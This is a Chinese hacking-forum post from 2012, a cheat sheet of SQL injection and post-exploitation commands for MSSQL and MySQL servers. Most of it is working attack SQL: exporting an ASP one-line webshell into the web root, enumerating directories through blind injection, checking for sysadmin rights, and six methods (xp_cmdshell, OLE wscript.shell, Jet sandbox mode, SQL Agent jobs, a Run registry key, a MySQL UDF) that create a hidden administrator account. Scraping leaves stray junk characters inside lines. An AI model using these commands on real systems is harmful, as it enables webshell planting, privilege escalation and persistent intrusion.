找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2757|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
7 o& u) y  v) }0 V. B, V0 a首先确定网站的WEB路径
6 Q( N7 K! g# ?;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马3 M6 ?0 q/ Z8 z# j  Z
( M' c- j+ i2 x
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- ( g; c8 |# {$ Z/ R- ?$ U- r
//将一句话木马插入表中
6 K  A1 N8 c/ G& l3 ]4 w; {7 R
& A; z" R' G4 R* }+ _3 o;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
5 l, |- G2 g: e4 k4 N! t//导出一个ASP文件
* V4 P4 {1 B8 @, c" m9 c  @0 {- N- z1 r
: J) x3 ]9 A8 j1 C1 R5 q
关于MSSQL列目录' s' p" \6 S* r8 z! S8 G: }/ q
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表% @' g, b3 K; y4 G, P  [
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
( S# B+ U* b/ G8 G9 d6 B
$ y$ B0 W- w( v3 r* {and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
; j5 [. C- ?) m$ Y8 K0 v7 {4 i
" |6 B) z+ `: V9 ?And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段3 Q! H9 H  b9 I. x2 E! B/ |7 y

) w. L* \1 s& m* qAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
) x$ H0 ?2 C4 M: M- g% ^9 Y# b
6 A0 H' c  |% X' y9 R2 O- ~4 P, T0 ^  k# s4 p
数据库版本和权限查看
) ^7 j! {( ~7 Z/ B9 Mand 1=(select @@VERSION) //查看详细的数据库信息.
' F) F0 s: i+ I7 I# K7 M! Band 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA& _5 J) u6 Q' `  T
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER3 Q! a4 t9 D7 q  \7 G2 j

% H6 n- g( w3 q. t1 ?6 W  J, b
) h+ L$ w3 z) M- P: J1.利用xp_cmdshell执行命令
, F/ y( U, |+ z' mexec master..xp_cmdshell 'net user rfire 123456 /add'" S% ?& d' {, K2 B) o/ I
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
; Q5 F. C3 U( g$ Q. J) a+ K
0 J: e8 ^) j/ o$ j4 {恢复xp_cmdshell存储过程! @5 R* V1 X, `3 K8 d5 Z' z4 e
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll': J& E& T$ `7 X

9 ~7 z3 N; R  K& S3 D0 U8 @% m$ b+ O1 b6 ~7 |
2.利用SP_OAcreate和SP_OAMETHOD执行命令
4 o/ a' n) P; V+ `4 w, E在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下& y/ w( y, E) u. L
DECLARE @shell INT //建立一个@shell实体
& `# A1 m6 E7 n* v* H. l8 lEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
' {- c* h1 I* c$ {/ M* VEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例" T1 N- Z& f# q- |4 d! s
' s; |* J- ]4 i7 L" w" j% F
: p% f3 n# D0 T* a5 C6 r
3.利用沙盒模式; F1 T) D8 o; r% H2 |1 I
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。' T" s8 C( E0 u6 I
开启沙盒模式:
7 U6 H' H: I- O! j5 \) MEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
( D8 ?- H! h1 z7 G. Z- n
) L1 t$ N2 }: f# k9 d执行命令:0 M5 {! Q. u4 r- [( ?! `5 u
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
% U0 K9 q0 \6 X0 C& n& l9 o4 j+ F4 v) m4 v' C
7 _9 |) o. |- b4 D# H! f
4.利用SQL代理执行命令
  }! d% `4 H  LEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
) J2 e+ o- z0 E. x  q( m- M! y& v5 O& U
执行命令:
3 ~. F( t2 h# r/ Y( x+ v2 Fuse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错9 @& \2 Y! N8 o( `
exec sp_add_job 'x'
9 J' V$ P( Z6 N$ I$ ~! rexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
! W  X3 M/ j0 h: g) xexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业9 w# O; ~/ |( i. R& C: K4 D1 u

/ i5 o. o2 J0 X% P( l! C+ A. h
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
1 P: L2 X% X/ E; \/ r  z$ LEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'0 O) Z3 d5 G) ~

2 [3 a! I3 i( c0 `" L9 [8 }. n- S3 t1 h6 Y+ W
6.MYSQL的命令执行1 c  @- ]1 A: @; Q2 `' g
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)! y7 N& a# K& l  j: P! V
首先要在su.php下导出c:\windows\udf.dll: l. B- q; i- }  Q
导出后执行创建自定义函数命令:- t: |0 ~3 Q/ o/ X3 u
Create Function cmdshell returns string soname 'udf.dll'
# n! w/ K9 a( ~1 w& S7 ~" f执行命令$ V# M" e6 l0 J" w- j! O4 P0 ^  j
select cmdshell('net user rfire 123456 /add')
) e+ ?+ c7 c9 J5 R执行后删除函数 drop function cmdshell  B+ j" J; l) _. m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表